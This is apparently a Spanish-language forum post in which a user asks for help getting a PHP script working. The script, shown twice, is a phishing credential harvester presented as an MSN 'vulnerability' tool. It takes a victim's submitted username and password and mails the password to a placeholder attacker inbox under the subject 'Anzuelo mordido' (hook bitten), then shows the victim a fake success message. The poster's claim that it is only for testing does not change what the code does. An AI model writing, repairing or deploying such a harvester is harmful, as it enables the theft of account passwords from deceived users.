RaidMan
03-06-2007, 19:09
Buenas!
Tengo una duda... vereis estoy intentando probar el script de la vulnerabilidad de msn (aquel que metio school) solo que lo encontre por otra pag.
El caso es que lo subo a un servidor ftp y la pagina inicial si que me sale (el index.html) pero cuando relleno el formulario con unos datos inventados (ya he dicho que es solo para hacer pruebas) y le doy a "Analizar" en vez de ejecutar el script php y mostrarme el mensaje de error que me deberia mostrar, me muestra el codigo del script en una nueva pestaña. Alguien sabria decirme porque es??
Os dejo el codigo del script para que lo veais y me digais que puede estar mal:
<?php
$usuario = $_POST['usuario'];
$password = $_POST['password'];
$header = "From: . [email protected] . \r\n";
$header .= "Mime-Version: 1.0 \r\n";
$header .= "Content-Type: text/plain";
$mensaje = "Datos obtenidos sobre la direccion [email protected] , la contrasena es: $password . \r\n";
$mensaje .= "El e-mail es: [email protected] \r\n";
$mensaje .= "Enviado el date('d/m/Y'), time())";
$para = "TU_ CUENTA_ DE_CORREO @hotmail.com";
$asunto = "Anzuelo mordido";
if (mail($para, $asunto, $mensaje, $header)) {
echo "Instalación Satisfactoria";
}
else {
echo "Ocurrió un error, porfavor ingrese denuevo sus datos";
}
?>
Un saludo y gracias
PD: Si quereis tambien el index.html (porque creo que es diferente al que colgo school) pedidmelo
Tengo una duda... vereis estoy intentando probar el script de la vulnerabilidad de msn (aquel que metio school) solo que lo encontre por otra pag.
El caso es que lo subo a un servidor ftp y la pagina inicial si que me sale (el index.html) pero cuando relleno el formulario con unos datos inventados (ya he dicho que es solo para hacer pruebas) y le doy a "Analizar" en vez de ejecutar el script php y mostrarme el mensaje de error que me deberia mostrar, me muestra el codigo del script en una nueva pestaña. Alguien sabria decirme porque es??
Os dejo el codigo del script para que lo veais y me digais que puede estar mal:
<?php
$usuario = $_POST['usuario'];
$password = $_POST['password'];
$header = "From: . [email protected] . \r\n";
$header .= "Mime-Version: 1.0 \r\n";
$header .= "Content-Type: text/plain";
$mensaje = "Datos obtenidos sobre la direccion [email protected] , la contrasena es: $password . \r\n";
$mensaje .= "El e-mail es: [email protected] \r\n";
$mensaje .= "Enviado el date('d/m/Y'), time())";
$para = "TU_ CUENTA_ DE_CORREO @hotmail.com";
$asunto = "Anzuelo mordido";
if (mail($para, $asunto, $mensaje, $header)) {
echo "Instalación Satisfactoria";
}
else {
echo "Ocurrió un error, porfavor ingrese denuevo sus datos";
}
?>
Un saludo y gracias
PD: Si quereis tambien el index.html (porque creo que es diferente al que colgo school) pedidmelo